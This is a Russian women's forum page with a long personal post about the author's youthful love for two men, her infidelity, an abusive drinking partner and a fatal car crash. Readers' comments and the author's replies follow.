Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-09 13:41:47 от Гость
Всем доброго времени суток!)) Нужен совет по воспитанию сына. Сыну через 1, 5 месяца исполнится 9 лет. В последнее время все чаще замечаю, что не справляюсь с ним. Он очень изменился. Раньше, в более маленьком возрасте был очень добрым, любознательны ... Подробнее
Последний комментарий
История : Дайте совет
23 минуты назад2016-12-10 19:21:03 от Гость
Ну вот теперь вы знаете какие бывают подруги. И на будущее никогда не делитесь самым сокровенным с близкими подругами. Люди всякие бывают. Может она вам просто завидует. Все комментарии67696
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
Демодекоз
два часа назад2016-12-10 17:07:59
ШЛЮХА
08 декабря в 21:42:56
Помоги советом
08 декабря в 21:35:34
Комедия
07 декабря в 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Истории о любви - Я помню о тебе
Истории о любви : Я помню о тебе     

Привет. Давно хотелось рассказать эту историю, но она слишком длинная и слишком личная, и все как-то не было подходящего настроения. Как-то я проговорилась в комментах, что изменяла в отношениях, и что измены мне прощали. Вот моя история, как она есть, я ничего не буду изменять и приукрашивать, хоть и знаю, что поступала часто глупо, неправильно, по-детски. Но это было, этого не изменить, я была юной и глупой, что тут скажешь. В общем, начну. Я уже догадываюсь, что история получится длинной, это история любви, и я точно не сумею написать ее вкратце. Так что спасибо каждому, кто дочитает.

В 17 лет я познакомилась со своей первой любовью. Ему было 23, он был весь такой темненький, загорелый, накачанный, со жгучими глазами. Я работала на рынке, он подошел, что-то спросил, и… это было как в кино. Честно. Я посмотрела в его глаза и пропала. Он смотрел на меня не мигая и не мог перестать смотреть. Между нами сверкали искры, трещали электрические заряды, я смотрела и смотрела в его темные-темные глаза. Он влюбился сразу же. Я тоже. Это была любовь, которая бывает нечасто и, наверное, не у всех. И это была любовь такая, какой может быть только первая любовь. Мы гуляли дни и ночи напролет, мы держались за руки всегда, он смотрел на меня, как на икону, как на что-то неземное, я не могу описать, что чувствовала я. Точнее всего будет сказать, что каждую минуту, каждую секунду своей жизни я чувствовала, что я самая счастливая в мире, во Вселенной, потому что он со мной. Он писал смс постоянно, каждые полчаса, я просыпалась утром с мыслью, что я его люблю, я счастлива этим, и засыпала с этой же мыслью. Через 2 недели мы жили вместе. Мы не могли наговориться, надышаться, насмотреться. Каждый телефонный разговор он начинал не фразой "привет", а словами "я тебя люблю". Я не преувеличиваю и не приукрашиваю, поверьте. Это была самая сильная любовь, которая была в моей жизни. Имя этой любви - Леша.

Он меня безумно ревновал ко всем, ко всему, мне кажется, он меня ревновал к воздуху, потому что я им дышу. Он устраивал сцены, я бросалась на него с кулаками, он хватал меня в охапку, душил поцелуями, мы мирились. Секс… Секс был потрясающим. Это… даже не возможно объяснить до какой степени он был хорош. Все было хорошо, так хорошо, что и невозможно представить. Эта любовь оглушила меня, ослепила, лишила разума. Я многого не замечала, я видела только его, его глаза, его голос. Он боготворил меня, я растворялась в нем. Целый год.

А потом все пошло на спад. Сейчас трудно вспомнить, что пошло не так, но скорее всего, просто начало проходить первое очарование. Я стала видеть его недостатки, он, пожалуй, тоже понял, что я из плоти и крови, живая девочка, а не ускользающая фея. Я в то время расцвела. Была очень хорошенькой. Он гордился мной, хвастался мною друзьям, выставлял напоказ, но в то же время страшно злился, от того, что вокруг меня всегда имеются поклонники. Пил. Пил много, чем дальше, тем больше. Все чаще в наших ссорах (которые становились чуть ли не ежедневным ритуалом) я слышала в свой адрес оскорбительные слова. Очень плохие слова. Он ревновал меня, хотя я (видит Бог) не дала ему ни одного повода имею миллион возможностей. Он все так же был для меня всем. Но я выслушивала каждый день обвинения, его какие-то смутные подозрения, он винил меня в связи с каждым своим другом, то я улыбалась мальчику на заправке, то крутила попой перед кем-то на пляже. Это было абсурдно и бесконечно. Ему было самому плохо от его ревности, он страдал, а я все больше злилась. Слушая через день, что я девица легкого поведения, во мне стала копиться обида и противоречивое желание: "Все равно выслушиваю, так хоть буду знать за что". Я не оправдываю себя. В принципе, я изменила ему не из-за этого. Просто я встретила другого мальчика. Другого Лешу.

Я устроилась работать в казино. В другой смене работал охранником мальчик Леша. Он был старше меня на пару лет, и был полной противоположностью моего Леши. Был умный, сдержанный, не пил, не курил, спортсмен, точнее КМС по борьбе без правил. Он жил спортом, он был честный, прямой, открытый, порядочный. У него была девочка. По очень странной иронии судьбы ее звали Оля.

Сразу мы просто обменялись взглядами, я его почти не помню, но он говорил, что он в первую минуту подумал: "Красивая. Но тупая. В глазах отсутствие всякого присутствия". А потом, спустя энное количество времени мы почему-то работали в одну смену. И как-то... даже не знаю. Точно помню, что мы слушали у меня на телефоне песню Жуки "Батарейка". (Днем почти не было людей). Я пела, думая о своем, а он смотрел на меня не мигая, как когда-то мой Леша. Потом он рассказал мне о своей Оле. Излил душу. Что у них все плохо, они отдалились, она закрутила с каким-то таксистом, а он просто не знает, что делать. Я ему тогда посоветовала решиться на шаг и поговорить с ней, сказать ей то, что он сейчас сказал мне. Он очень переживал, но поговорил с ней. Она сказала, что любит своего таксиста. Они расстались. Но Леша больше не страдал. Он поменялся со своим другом (который работал в смене со мной) и просто однажды вышел работать ко мне. Я сделала вид, что так и надо, я не удивлена, и все в порядке. Пару рабочих смен мы просто делали вид, что не знакомы. Ходили мимо друг друга со стеклянными глазами, не глядя, не подавая виду. Он смотрел на меня, когда думал, что я не вижу, я думала о нем дома, засыпая со своим Лешей и ожидая следующей смены. А потом, мы случайно столкнулись в темноте подсобки и без слов начали целоваться. Бешено. Страстно. И неудержимо. Это длилось бесконечно долго, он только иногда говорил: "Оля…" а я закрывала ему рот рукой: "Я знаю".

Так все началось. Этот человек вошел в мою жизнь со своей любовью. Я могу точно сказать, что никто и никогда не любил меня, как он. Наверное, что-то было маниакально ненормальное в этой любви. Я просто плыла по течению, не в состоянии взять на себя ответственность за решение. Дома я по прежнему безумно любила своего Лешу, на работе у меня был другой Леша. Они были настолько разные, противоположные, что выбрать одного мне казалось невозможным. С одним у меня была страсть, постоянная борьба, феерический секс. Я любила его до умопомрачения. Другой был словно моим отражением в зеркале, Эти фразы заезжены донельзя, но он понимал меня с полуслова, а иногда и вовсе без слов. Я всегда знала, что он чувствует, потому что была такой же, как он. Между нами была какая-то невидимая связь, мы могли не писать-не звонить друг другу неделю, а потом одновременно набирать друг друга. Он помогал мне во всем. Я знала, что он всегда сделает все, что в его силах и даже больше для меня. Как думаете, можно ли любить двоих? Думаете нет, я знаю. А я думаю, что, пожалуй, да. Продолжалось это, не скажу даже точно сколько, около полугода. Секса у меня со вторым моим Лешей не было, но то, что было, с лихвой заменяло секс.

Чем дальше в лес, тем меньше шансов, что на шашлыки… Становилось все труднее. Новый мой Леша начинал требовать, хочу тебя всю, уходи от него, выходи за меня. Я думала, телилась, я была в полной растерянности. Я была всего лишь маленькой глупой девочкой. В свое оправдание могу сказать, что я искренне раскаивалась. То есть ужасно винила себя за то, что поступаю так. И именно поэтому я однажды проснулась утром и решила, что дальше так нельзя, и сказала Леше №2, что "все кончено", и только после этого своему Леше №1 призналась в измене.

Дальше сложно передать. Один звонил, писал, караулил меня, приходил к моей маме, удивлял ее беседой: "Здравствуйте, я Леша, и я люблю вашу Олю". Второй бил кулаками до крови стену, крушил все вокруг меня, насиловал меня, потом бросал, потом звонил, признавался в любви, потом оскорблял, потом ползал на коленях… Нервы были на пределе, я всерьез подумывала о самоубийстве, я была эмоционально измотана. Длилось это долго, не помню сколько, но месяцев пару. Потом я слегла ни с того ни с сего с температурой 41 среди лета. Помню, лежала и готовилась принять свою смерть, со мной, как верный пес, сидел мой любимый, сквозь пелену раздался звонок в дверь, он пошел открывать, а дальше совсем бред, на пороге мой второй Леша, с банкой варенья, дисками и лекарствами. Ему на работе сказали, что я заболела. Мой Леша хотел бить ему морду, но закончилось это разговором: "Чувак, прости, ты неплохой, но я люблю ее, она нужна мне". И, как ни странно, мой психический Отелло отвечал: "Чувак, забудь, она не для тебя, тем более мы говорили, она любит меня, она не уйдет, я ее ни за что не отдам". Это все было как в бреду. Единственный раз они сидели оба около меня, говорили обо мне, а я лежала, горела от температуры и думала, что, должно быть, я ужасно выгляжу.

Сокращу 2 года в абзац. Леша уволился с работы, сказал пафосно "Будь счастлива" и попытался исчезнуть. Но почему-то, по какой-то пугающей закономерности он появлялся каждый раз, когда я ругалась со своим парнем. Наши встречи были эпизодическими, но когда мы виделись, его трясло, он нюхал меня, как ненормальный, он в бреду шептал, как сильно любит. Секса у нас так и не было. Он сошелся со своей Олей, она вернулась виноватая и захотела замуж за него (он к тому времени нормально поднялся). Я не звонила ему ни разу. Всегда звонил он. И каждый раз, когда я в ссоре с Лешей. Тогда я смеялась и считала, что это милая закономерность, сейчас понимаю, что было что-то пугающее в этом. Он всегда знал через 5 минут, что мы в очередной раз расставались навсегда.

Ссоры с моим любимым становились все отчаяннее. Я уже не знала, что это: любовь или ненависть. И чего больше в наших отношениях. Но уйти не могла. Без него жить просто не хотелось. Однажды в порыве ссоры я наорала на него, надавала по щекам и умчалась, как всегда, в ночь, успокаивать нервы. Возле дома столкнулась с кем-то. Уже зная с кем, потянула его гулять в ночной парк. Как он знал? Для меня до сих пор это кажется чем-то сверхъестественным. За этот вечер мне стыдно. И за него и за себя. Ему звонила Оля. Они должны были встретиться в ту ночь. Я деликатно отошла, но он равнодушно сказал ей, что занят и не знает, когда освободится. Она, конечно, знала обо мне. И, разумеется, все поняла. Конечно, она меня ненавидела.

Мы наматывали круги по парку, я курила одну за одной, он меня пытался упокоить, а потом на набережной заиграла медленная музыка, и мы начали танцевать. Потом мы целовались. Долго-долго. Потом пошел дождь. Мы перестали целоваться, когда начался ливень с градом. Эту ночь я запомню навсегда. Домой вернулась мокрая насквозь, влюбленная.

Таких ночей было много. Металась и вела себя в высшей степени непорядочно и глупо. Хотела усидеть на двух стульях, глупая, глупая девочка. Потом решила быть умной, взрослеть. Послала своего платонического любовника и мы не созванивались, не знали друг о друге с полгода точно.

А потом… Я заболела гайморитом. Резко и опасно. А герой моего сердца кинул меня и умотал на море загорать. Не знаю, почему он тогда так поступил, скорее всего из-за какого-то принципа, у нас тогда большинство поступков были продиктованы принципом доказать друг другу, кто же круче.

Он уехал на море, а я в больницу в тяжелом состоянии. Мне пробили гайморовы пазухи, я лежала в палате с распухшим красным шнобелем, из которого торчали кровавые ватки, когда в палату вошел Леша №2. Вот так, просто без предупреждения, спустя полгода, или больше, молчания. Он почувствовал, что мне плохо, позвонил первый раз за полгода моей подруге, выдавил из нее больницу, где я прохлаждаюсь, и вот он передо мной. Ухаживал, выхаживал. Приходил каждый день, покупал вкусности, лекарства, разговаривал с врачами. Я тогда не могла простить предательства своего парня, разрывалась от благодарности к этому, и в итоге я с ним переспала. Спустя 2 года после знакомства.

За это мне тоже стыдно. И не за то, что я такая легкодоступная или легкомысленная. Нет. Но я понимала, что привяжу его этим уже окончательно. Я это понимала и не должна была так с ним поступать. Это было нечестно.

Однажды мы сидели с ним у него дома, когда раздался звонок в дверь. Сцена из дешевой мелодрамы. Пришла Оля с бутылкой вина и далеко идущими намерениями. Она хотела его, а ему было очень неловко, а я была милой. Расспрашивала ее о работе, улыбалась и излучала доброжелательность. Думаю, она хотела меня убить. Потом она настояла и они вышли на балкон, где она ему говорила, что я ему не пара, что он болен, что у него мания, зависимость, что я его брошу, таким, как я, не нужны такие, как он, говорила, что я играю им… Это все было правдой на самом деле. За эту ночь мне тоже стыдно.

Он провел ее до такси. Вернулся. Обнял, уткнулся в волосы, просил поклясться, что в этот раз я его не брошу, что это серьезно. Просил сказать сейчас, если я хоть каплю сомневаюсь. Я кивала, обещала. Он хотел меня навсегда, я же тогда ему могла предложить только секс.

Постараюсь закончить побыстрее. Очень длинно получается. После этого я все равно вернулась к своему парню. Это один из самых низких поступков в моей жизни. Мне правда очень, очень стыдно. Я любила и была слепа, глуха, безмозгла.

Он исчез. На этот раз окончательно. На прощание попросил позвонить ему, если я расстанусь со своим и мы не будем вместе минимум полгода. Знаете, он тогда обещал, что всегда готов будет быть со мной, если я этого захочу, когда бы это ни случилось. Понимаю, что это детский сад, но иногда я возвращаюсь к этой мысли.

Потом пришла расплата. По крайней мере я так думаю. Я вылила на себя 10 литров кипятка и рисковала остаться Франкенштейном до конца жизни. От подбородка до пупка, включая руки до кончиков пальцев, я была покрыта синюшными волдырями. Очень серьезно обожгла одну грудь. Эта боль… Это очень больно, очень-очень больно. Мне пересаживали кожу. Все обошлось. Лишь пару шрамов напоминают об этом.

Через 2 месяца мы попали в аварию. На глазах у меня умер мой близкий друг. Любимый человек умирал на моих руках. Это самая страшная ночь в моей жизни. Холодная ноябрьская ночь, в чистом поле я босая ползаю с переломанным тазом в одиночестве и ищу в темноте своего любимого, который где-то хрипит в каких-то предсмертных конвульсиях. Этого я никогда не забуду. Это травма, хоть и пафосно, но это моя психологическая травма. Эта ночь "повзрослела" меня. Изменила. Благодаря аварии, как это ни ужасно, я смогла наконец переосмыслить свою жизнь.

Я лечила свои раны, выхаживала своего любимого, уже понимая, что скорее всего брошу его, как только он оправится. Я что-то краем уха слышала, что Леша №2 уехал в другую страну после того моего предательства. Меня это не слишком беспокоило, скажу честно. Своих забот хватало. Я пережила ужасное по силе болезненности расставание с любовью всей своей жизни. Случайно слышала от общих знакомых, что Леша №2 в Питере, живет с девушкой.

Шло время. И вот мне уже года 23. Мама встретила его в нашем городе. Приехал в гости, навестить родителей. Мама испугалась. Он, говорит, изменился. Спрашивал, просил мой номер. С той девочкой он расстался. Мама номер не дала, побоялась. Я тогда во всю строила дом со своим бывшим. Мама боялась, что он опять, как смерч, ворвется в мою жизнь и все разрушит.

И вот. Не так давно. Я иду со своим парнем за ручку, вечер, центр города, мы идем куда-то посидеть в кафе, воркуем мило-мило, остановились на светофоре, и вдруг, я, честное слово, почувствовала, как мою спину обдало холодом. Словно холодной водой облили. Резко, неожиданно. Обернулась. И покачнулась. Как во сне. Стоит он. Смотрит и улыбается. Я его не видела лет 7. Не поверила, думала, привиделось. Сцена была глупой, но я не могла пошевелиться. Смотрела и смотрела, а он на меня. Пока это не стало неприличным. Мы ушли: удивленный мой парень и пришибленная я.

На следующий день я с мазохистским удовольствием изучала его страницу вконтакте, и радовалась, что у меня своей нет, потому как была абсолютно уверена, что он опять ищет меня по знакомым.

Он такой же. И хоть я другая, он мне небезразличен. Я очень люблю своего парня. Очень, правда, очень-очень. Но иногда, редко, честно редко, всего пару раз. Я ввожу в поиск его имя фамилию и смотрю его бои с кем-то, и, как прежде, сердце замирает. Его лицо родное. Его жесты мне знакомы и понятны. Каждый оттенок его мимики я знаю.

Я не знаю, чем закончить. Очень длинно получилось? Я не могла сократить, я и так, кажется, столько всего не рассказала, не смогла передать, объяснить. Спасибо еще раз каждому, кто дочитал. Это целый пласт моей жизни. Наверняка у многих история вызовет негативные эмоции и это правильно. Мне просто захотелось рассказать вам о Леше.

Спасибо за внимание. Буду рада любым комментариям.

 

59863
Другие Истории о любви
(90)
Гость
Гость

09 июля 2015 12:01:26
2015-07-09 12:01:26

У каждого из нас есть чулан памяти, в который лучше не заглядывать. Иначе вылезают старые чувства, обиды, страсти. Зачем ты себя растравляешь, ходишь к нему на страничку? Не надо. Они оба - твое прошлое. Живи настоящим, держись за настоящее. Разве тебе в нем чего-то недостает? За прошлое ты так или иначе расплатишься, еще не расплатилась, так как оно тебя держит.

Знаешь, если я буду так же вспоминать и переживать свою жизнь, свои ошибки, я сойду с ума. Поэтому я закрыла дверь памяти и забила ее гвоздями. Это была прошлая жизнь, теперь у меня другая, и я другая.

Ответить
Поддерживаю Да10 / Нет0
Burundik
19101 Burundik
Burundik offline
Репутация : 295488
Комментариев 2313 6
09 июля 2015 12:05:42
2015-07-09 12:05:42

читала на одном дыхании... мне почему то не хотелось вас осуждать, появилось даже легкая зависть, что вам так повезло и довелось испытать такую сильную любовь...

Ответить
Поддерживаю Да12 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
09 июля 2015 12:10:08
2015-07-09 12:10:08

Burundik, вот-вот. А если бы аналогичную историю написал парень, то реакция была бы иной)) Обозвали бы как минимум непорядочным человеком ))

Ответить
Поддерживаю Да2 / Нет0
счастливая кошка
5740 счастливая кошка
Счастливая Кошка offline
Репутация : 681899
Комментариев 4439 8
09 июля 2015 12:12:50
2015-07-09 12:12:50

Я только не поняла, сейчас вы не с Лешей 1 - верно? у вас новый парень? А как сложилась судьба у Леши1? Каким было само расставание?...

Я согласна с Aes Sedai, что прошлое надо оставить в прошлом... Я сама все сделала так же - закрыла прошлре в сейф и забыла кодовый замок, хотя там столько всего было... ой... но сейчас я другая и если я сама начну вспоминать прошлую жизнь, людей и отношения - это как буд-то не я! это не со мной - так мне проще! я абстагировалась...

В ам советую - не мучать себя поисками его видео и просмотрами его старницы в сети... хотя бы ради спокойного будущего! Вас столько всего связывало, вы столько всего знаете друг о друге, что лучше вашим прошлым фантомам умереть)))

Ответить
Поддерживаю Да5 / Нет0
Понимать меня не обязательно!Обязательно - любить и кормить во время!© Чеширский Кот
Burundik
19101 Burundik
Burundik offline
Репутация : 295488
Комментариев 2313 6
09 июля 2015 12:14:09
2015-07-09 12:14:09

Farba, кто знаеет, одно дело мужу изменять, другое парню, тем более о Оли не было с Лешей 2 даже секса, да еще и в молодости!

когда мне было 17-20 лет, признаюсь, я тоже изменяла парням , даже встречалсь сразу с двумя, да еще и поклонников парочка была_))) но измена в то время для меня было - это поцелуи, так как ни с кем не спала еще в то время

Ответить
Поддерживаю Да2 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
09 июля 2015 12:18:11
2015-07-09 12:18:11

Burundik, ну так это у Вас и вовсе не измена была, просто легкий флирт. А вообще я в этой истории никакой любви не увидела, - это все так, гормоны по молодости гуляют. А любовь чувство серьезное, до него еще (морально) дорасти надо. Чего автору и желаю.

Ответить
Поддерживаю Да2 / Нет0
Дестини
15851 Дестини
Дестини offline
Репутация : 616951
Комментариев 2814 41
09 июля 2015 12:33:38
2015-07-09 12:33:38

Farba, Вы смотрите с позиции своей, с высоты так сказать, прожитых лет. Да, в моем понимании тоже любовь возвышенное и глубокое чувство, основано на душевном родстве, на притяжении душ. Но у меня тоже так любить не получается. У меня любовь страсть, огонь и такое же почти, что описала Кошка у меня было. Почти все мне знакомо, до боли.

Оля, мы с тобой и раньше это обсуждали и мне все твои метания, все знакомо. Не знаю, читала тебя и ты пробудила у меня свои воспоминания и чувства. Хочу тебя в который раз поблагодарить за искренность. Ты всегда очень искренне пишешь и честно. По поводу твоей истории, у меня мелькнула мысль, что такая любовь (мое личное мнение) не может так просто уйти. Я верю в судьбу, дай Бог, чтобы у тебя с твоей нынешнем парнем все и дальше было гармонично. Но мне чего-то кажется, что ты с Лешей еще пересечешься. Есть такое понятие, от судьбы не уйти, кто знает....

Ответить
Поддерживаю Да6 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2901012
Комментариев 17187 30
09 июля 2015 12:36:42
2015-07-09 12:36:42

Да дуюаю у многих из нас было нечто подобное... Я в этом плане тоже косячная... Правда без секса происходило всё, но я металась от одного к другому и как-то совсем несерьёзно относилась к парням. Сегодня с Мишей, завтра с Гришей... Сейчас вспоминаю некоторые моменты из жизни и становится ну очень как-то неловко. А главное не могу понять, чем я руководствовалась, когда совершала некоторые поступки. Но это было в моей жизни, и я стараюсь как бы не вспоминать... То были мои ошибки, я их учла.

Да и прошлое ворошить не стоит. Что было то прошло.... Раз так оно было, значит так оно и должно было быть....

Прочитала историю и вспомнила своего Серёжку, которому я немало потратила нервных клеток. Он меня любил, я знала об этом, но относилась наплевательски и потребительски. Сейчас стыдно, но тогда считала, что так оно и должно быть. Максимум, что у него со мной было, это обнимашки. Он меня грел, когда я замёрзла. А ещё постоянно нюхал мои волосы... А я делала вид, что не вижу ничего и крутила шуры-муры с его лучшим другом. Не забуду никогда тот вечер, когда у меня случились целовашки с его другом при нём. Он просто отошёл... И где-то долго его не было. А когда он вернулся, по его глазам видно было, что он плакал... Страшно то, что мне на тот момент было всё равно.... Я продолжила обнимашки и целовашки с его лучшим другом. Ведь тогда у меня к его другу была любоффффь, я так считала. Сейчас как-то стрёмно с этой ситуации.

Серёжка ещё долго меня любил. Я уже отношения с Артёмом начала, тот продолжил бегать за мной. Он просил меня тогда, чтобы я Артёма бросила и к нему пришла. Договорились тогда, что мы договорим, я приду на встречу. Ибо когда он меня встретил и начал это говорит , я спешила. Я не пришла.

Сейчас он женился и я рада за него... Искренне. Надеюсь, что у него всё хорошо.

Ответить
Поддерживаю Да9 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

09 июля 2015 12:37:41
2015-07-09 12:37:41

После прочтения этой истории мне кажется что кроме себя вы никого не любили! вам просто нравилось когда за вами ухаживали!

Ответить
Поддерживаю Да2 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
09 июля 2015 12:49:23
2015-07-09 12:49:23

Дестини, любовь это прежде всего ответственность, даже если с родством душ не очень получается. И не списывайте на возраст, есть и молодые люди с моральными принципами и ответственностью за тех, кто с ними рядом. Я лично таких знаю. А есть и те, кто до старости любит только себя.

Ответить
Поддерживаю Да2 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 13:02:42
2015-07-09 13:02:42

Во-первых, спасибо всем за время, потраченное на прочтение такой длинной истории. И спасибо каждому за мнение.

Aes Sedai,счастливая кошка, почему вы решили, что я сейчас страдаю по нему? Нет, это совершенно не так. Я могу даже не вспоминать о нем месяцами, я не рыщу по его страничке, я туда вообще один-единственный раз заходила, после нашей случайной встречи. Это все давно в прошлом и я понимаю, что там ничего уже не может быть. У меня осталось к нему что-то потому, что у меня не было шанса разочароваться в нем, именно потому что наша любовь была недосказанной, незаконченной осталось чувство незавершенности. Но я прекрасно понимаю, что вместе нам не быть. Я даже и не думаю об этом. Он любил стервозную взбалмошную девочку, которая выносила ему мозг. Я уже не та, да и он, думаю, тоже.

Я просто хотела рассказать вам эту историю. Абсолютно без контекста: "я страдаю и скучаю по нему". Это часть моего прошлого, которой мне захотелось поделиться, не более того.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
счастливая кошка
5740 счастливая кошка
Счастливая Кошка offline
Репутация : 681899
Комментариев 4439 8
09 июля 2015 13:08:21
2015-07-09 13:08:21

Сиреневая Кошка, я и не считаю, что вы по нему сейчас СТРАДАЕТЕ! просто он вам не безразличен спустя столько лет, плюс - ... сердце замирает.. - а это не просто так. А совет - закрыть его в чулан с прошлой жизнью - это для того что бы сейчас даже изредка не вспоминать и не возвращаться мыслями к нему, когда рядом есть любимый. Вот и все.

Ответить
Поддерживаю Да3 / Нет0
Понимать меня не обязательно!Обязательно - любить и кормить во время!© Чеширский Кот
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 13:09:31
2015-07-09 13:09:31

Burundik, Спасибо, я всю душу вложила в написание этой истории. Воспоминания вчера, конечно, нахлынули, когда писала. Но это все в прошлом.

счастливая кошка, Леша 1 очень пьет. Почитайте, если есть желание у меня историю "Первая любовь или как я могла быть такой дурой". Мы давно расстались, после аварии, это было очень нелегко, он до сих пор иногда возникает на горизонте, говорит, что любит, утверждает, что всегда будет любить. Зовет на свидания... Но, конечно, между нами пропасть. Во всех смыслах. Я думаю, что я смогла отпустить, перерасти эти отношения, а он нет. Он застрял в том времени и каждый раз мне говорит: ты помнишь, как мы друг друга любили, ведь это не может уйти в никуда... Мне жаль его. Жаль, что он на выпивку, не на тех людей тратит сою жизнь. Он хороший, добрый человек, но слишком легко и непринужденно относится к жизни. Ему не знакомы понятия ответственность, рассудительность... Хотя сейчас я его простила за все и желаю ему всем сердцем всего самого хорошего.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

09 июля 2015 13:11:33
2015-07-09 13:11:33

Сиреневая Кошка, во-первых, в истории ощущается масса чувств, тогдашних и теперешних. Она писана с надрывом и болью, я бы сказала. Было бы тебе всё равно - не писала бы ты так, писала бы отвлечённо. Во-вторых, я не говорила, что ты по нему до сих пор страдаешь. Этого я не могу утверждать (хотя мне кажется, что чувства у тебя к нему сохранились). Но я писала о том, что не стоит бередить затянувшиеся раны. К чему?

Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 13:14:55
2015-07-09 13:14:55

Farba, Спасибо за пожелания, конечно. Сейчас мне 26, в этой истории 18-19. Тогда я еще не была "морально зрелой и глубокой", я была юной, страстной, влюбленной. И я, честно говоря, рада, что была в юности такой. Я ни о чем не жалею.

Какая была я, такая была и моя любвоь.

Nikola, Ну это ваше мнение. Спасибо за него.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 13:17:52
2015-07-09 13:17:52

Aes Sedai, Да ни к чему, я просто поделилась воспоминаниями о своей любви. Когда писала, пыталась воскресить в памяти все чувства и эмоции, что переживала тогда, чтобы лучше выразить свои мысли. Может быть поэтому вы увидели надрыв и боль. Все в прошлом.

А чувства к неу... наверное есть, я выше писала почему. Это чувства не столько к нему, а к тому времени, это какая-то грустная и спокойная любовь к той любви. Не к Лешам конкретно.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

09 июля 2015 13:19:44
2015-07-09 13:19:44

Вот так история, как целая жизнь маленькой юной хрупкой девушки. Всего было 23 года, а такое пережить, страстные чувства, болезни, аварию. Ты очень сильная духом, закаленная жизненным опытом. Естественно случайно встретившись с Лешей, вся жизнь промелькнет перед глазами. Молодец, что написала историю, иногда это важно, освободить душу. Спасибо за откровения. Память не стереть.

Ответить
Поддерживаю Да6 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 13:23:17
2015-07-09 13:23:17

Блондиночка , Да, в таком возрасте все совершают глупости. Жаль твоего Сережу, я тоже рада, что у него сейчас все хорошо.

А с другой стороны, а когда еще совершать глупости, действовать импульсивно, поддаваться порыву и отдаваться страсти, как не в юности?

Дестини, Спасибо, Аня. Я была уверена, что ты поймешь. Спасибо тебе за это.

Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
09 июля 2015 13:24:38
2015-07-09 13:24:38

Вообще то это очень правильный приём писать о прошлом, о людях и тех эмоциях и чувствах, что связывали когда-то с этими людьми, так как эта своего рода терапия всю свою боль, свои сожаления переложить на лист бумаги(или на клаву) и будто-бы становится чуток полегче. Надо тоже так попробовать как-нибудь. Мы часто жалеем о своём прошлом, испытываем перед кем то вину, что поступили именно так а не иначе. Даже если объективно нашей вины нет, а я не считаю что вы в чём то виноваты, с Лёшей 2 у вас кроме целовашек не было ничего долгое время и это не измена( по крайней мере до момента когда вы не переспали), это был просто флирт у вас. и где-то Лёша 1 сам своей паталогической ревностью спровоцировал вас найти кого-нибудь. Так часто бывает, один хронический ревнивец, а другой просто из за того что его душит ревность, найдёт себе любовь или увлечение, но со спокойным темпераментом, полную противоположность ревнивца. А авария и получение ожёгов... Я бы не назвала это расплатой, вы же не человека убили или ещё какое серьёзное преступление совершили, что бы так расплачиваться. Не знаю, может это неудачное стечение обстоятельсв, фатальность, карма, когда на грани между жизнью и смертью.

Ответить
Поддерживаю Да4 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2901012
Комментариев 17187 30
09 июля 2015 13:27:21
2015-07-09 13:27:21

Сиреневая Кошка, ну это да. =) Зато есть что вспомнить... Есть масса запоминающихся, ярких - моментов. =)

Ответить
Поддерживаю Да3 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

09 июля 2015 14:02:47
2015-07-09 14:02:47
Сиреневая Кошка, я не поняла "Через 2 месяца мы попали в аварию. На глазах у меня умер мой близкий друг. Любимый человек умирал на моих руках. ". Кто именно умер? С кем ты сейчас с тем Лёшей , который заботился о тебе, приходил в больницу? Или другой сейчас?....................... ..... По поводу первого Лёши, этот человек разрушитель, судя по всему , он больше такой эгоист, ты заболела, его рядом нет уехал, а второй Лёша был лучше по человечески.
Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
09 июля 2015 14:09:31
2015-07-09 14:09:31

Гость*, Боже, я всех запутала. Ну во-первых. Я сейчас ни с тем, ни с тем. С того времени прошло лет 7.

Леша №2 уехал в Питер жить и развиваться, я осталась со своим парнем. Он пил все сильнее. Однажды он сел за руль нетрезвый, я села радом, с нами был наш общий друг. Мы попали а аварию. Наш друг умер на месте. Мой парень был в очень тяжелом состоянии, пережил клиническую смерть, его вытянули с того света. Спустя полгода или чуть больше после аварии мы расстались.

